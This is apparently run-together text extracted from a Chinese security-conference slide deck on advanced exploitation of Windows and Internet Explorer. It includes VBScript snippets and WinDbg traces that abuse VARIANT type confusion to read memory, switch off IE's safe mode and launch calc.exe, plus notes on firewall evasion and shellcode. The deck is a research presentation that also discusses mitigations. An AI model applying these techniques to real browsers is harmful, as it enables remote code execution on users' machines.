《APT 高级漏洞利用技术.pptx》由会员分享,可在线阅读,更多相关《APT 高级漏洞利用技术.pptx(29页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、APT 高级漏洞利用技术Who am I?真名:袁仁广网名:yuange360漏洞实验室主任2008北京奥运会特聘信息安全专家中国国家信息安全漏洞库特聘专家98年发现win9x网络共享密码验证漏洞20多年的安全对抗经验要点漏洞挖掘技术漏洞利用技术APT对抗时代 高级APT对抗技术防护技术漏洞挖掘技术人工分析程序自动化技术 Fuzzing技术 污点分析等补丁比对技术静态分析技术动态分析技术漏洞利用技术设计原则完美、和谐的标准:满足各种网络需求只要求目标存在漏洞稳定、可重复,不影响目标系统可扩展、可对抗简单、通用、傻瓜化对抗防火墙数据通道技术 client proxy firewall serve
2、recb ecb-ReadClient ecb-WriteClient查找socket getpeername查找socket 字串匹配查找socket对抗防火墙有线程recv的处理技术 wins:1、shellcode hook closesocket 2、exploit发送错误数据,server关闭socket,shellcode拦截rpc的端口复用技术 1、shellcode hook 服务的rpcnum入口 2、exploit 调用 NdrSendReceive溢出程序通用性技术连续覆盖同时使用ret、seh自动版本识别通用跳转地址 代码页地址通用指针 PEB-RtlEnterCrit
3、icalSection PEB-RtlLeaveCriticalSectionshellcode 高级技术解码+shellcode框架Shellcode通用性 GetProcAddress+LoadLibraryAc语言编写shellcode编写具有shell功能的shellcode hook技术内存后门技术通信加密APT对抗时代对抗DEP+ASLR+EMET+CFI如何对抗ANTI APT设备 1、无关键代码缓存 2、无事后关键代码追踪线索 3、旁路无法分析关键代码APT 高级漏洞利用技术DVE数据虚拟执行技术原理,97年两篇文章 注意利用解释型语言与CPU代码相结合的新型病毒 文本病毒(病
4、毒新理论)!解释执行也是执行利用漏洞增强指令集构造指针突破解释执行虚拟机远程代码执行转换成本地提权突破突破点关键通用的数据结构 Variant变量COM、VB、JS等大量使用 VB唯一数据类型JS9内部仍然保留使用tagVARIANT的定义 struct _tagVARIANT VARTYPE vt;WORD wReserved1;WORD wReserved2;WORD wReserved3;union LONGLONG llVal;LONG lVal;BYTE bVal;SHORT iVal;SAFEARRAY*parray;typedef unsigned short VARTYPE;V
5、ARTYPE列举enum VARENUM VT_EMPTY=0,VT_NULL=1,VT_I2=2,VT_I4=3,VT_R4=4,VT_R8=5,VT_BSTR=8,VT_VARIANT=12,VT_VECTOR=0 x1000,VT_ARRAY=0 x2000,VT_BYREF=0 x4000,;tagSAFEARRAY的定义typedef struct tagSAFEARRAY USHORT cDims;USHORT fFeatures;ULONG cbElements;ULONG cLocks;PVOID pvData;SAFEARRAYBOUND rgsabound 1;SAFEAR
6、RAY;const USHORT FADF_HAVEVARTYPE=0 x0080;/*array has a VT type*/const USHORT FADF_VARIANT =0 x0800;/*an array of VARIANTs*/typedef struct tagSAFEARRAYBOUND ULONG cElements;LONG lLbound;SAFEARRAYBOUND;具体利用实现细节通过漏洞修改VARTYPE vt修改vt得到需要的数组,cc+指针通过数组修改关键数据通过修改保护模式实现控件加载通过控件实现完全控制脚本就是shellcode跟踪演示代码 myar
7、ray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(32767)&chrw(00)&chrw(0)document.write(vartype(myarray)document.write(vartype(myarray(&h7ffe0030)跟踪过程0:008:x86 bp vbscript!vbsvartypeBreakpoint 0 hitVBSCRIPT!VbsVarType:0ffb31f8 8bff mov edi,edi0:008:x86 d poi
8、(esp+c)l 1000e8fa98 0c 40 4f 0b 00 00 c0 42-78 5a 4f 0b 10 00 00 000:008:x86 d poi(poi(esp+c)+8)l 100b4f5a78 08 00 00 00 00 00 00 00-04 fb f9 05 00 00 00 000:008:x86 d 5f9fb04 l 1805f9fb04 01 00 80 08 01 00 00 00-00 00 00 00 00 00 00 00 05f9fb14 00 00 ff 7f 00 00 00 00跟踪过程0:008:x86 e b4f5a78 0c 20 修
9、改字符串变量为数组0:008:x86 gBreakpoint 0 hitVBSCRIPT!VbsVarType:0ffb31f8 8bff mov edi,edi0:008:x86 d poi(esp+c)l 1000e8fa98 0c 40 50 0b dc 44 5e 06-30 00 fe 7f cc 46 5e 060:008:x86 d 7ffe0030 l 207ffe0030 43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00 C.:.W.i.n.d.o.7ffe0040 77 00 73 00 00 00 00 00-00 00 00
10、 00 00 00 00 00 w.s.执行结果8204=0 x200c 67=0 x0043 实现代码获得对象地址sub testaa()end subfunction mydata()On Error Resume Next i=testaa i=null ab(0)=0 aa(a1)=i ab(0)=3 mydata=aa(a1)end function 实现代码修改保护模式 function setnotsafemode()On Error Resume Next i=mydata()i=readmem(i+8)i=readmem(i+16)j=readmem(i+&h134)for
11、k=0 to&h60 step 4 j=readmem(i+&h120+k)if(j=14)then writemem(i+&h120+k)Exit for end if next end function实现代码弹计算器 function runcalc()On Error Resume Next set sh=createobject(Shell.Application)sh.ShellExecute calc.exe end function代码效果09年完成Bypass DEP+ASLR+EMET+CFI无修改过新出漏洞利用缓解措施无修改新出IE上通用无修改新出WINDOWS系统上通用通杀WIN95-WIN8.1+IE3-IE11原理可以用于其它操作系统、其它芯片平台代码效果代码效果防护技术漏洞利用缓解技术 DEP+ASLR+EMET+CFI沙箱 1、IE保护模式 降低权限,文件、网络、系统调用能使用。2、CHROME沙箱 限制使用,文件、网络不能使用,系统调用还能使用。系统内核的漏洞可以突破沙箱。防护技术更完善的沙瓶 1、沙瓶里代码只有执行权限,无其它任何权限,不提供任何系统调用 2、只能通过有限的瓶口接口调用外部,通过内存共享交换数据 3、沙瓶里的代码漏洞被完全屏蔽,漏洞只局限在有限的瓶口接口代码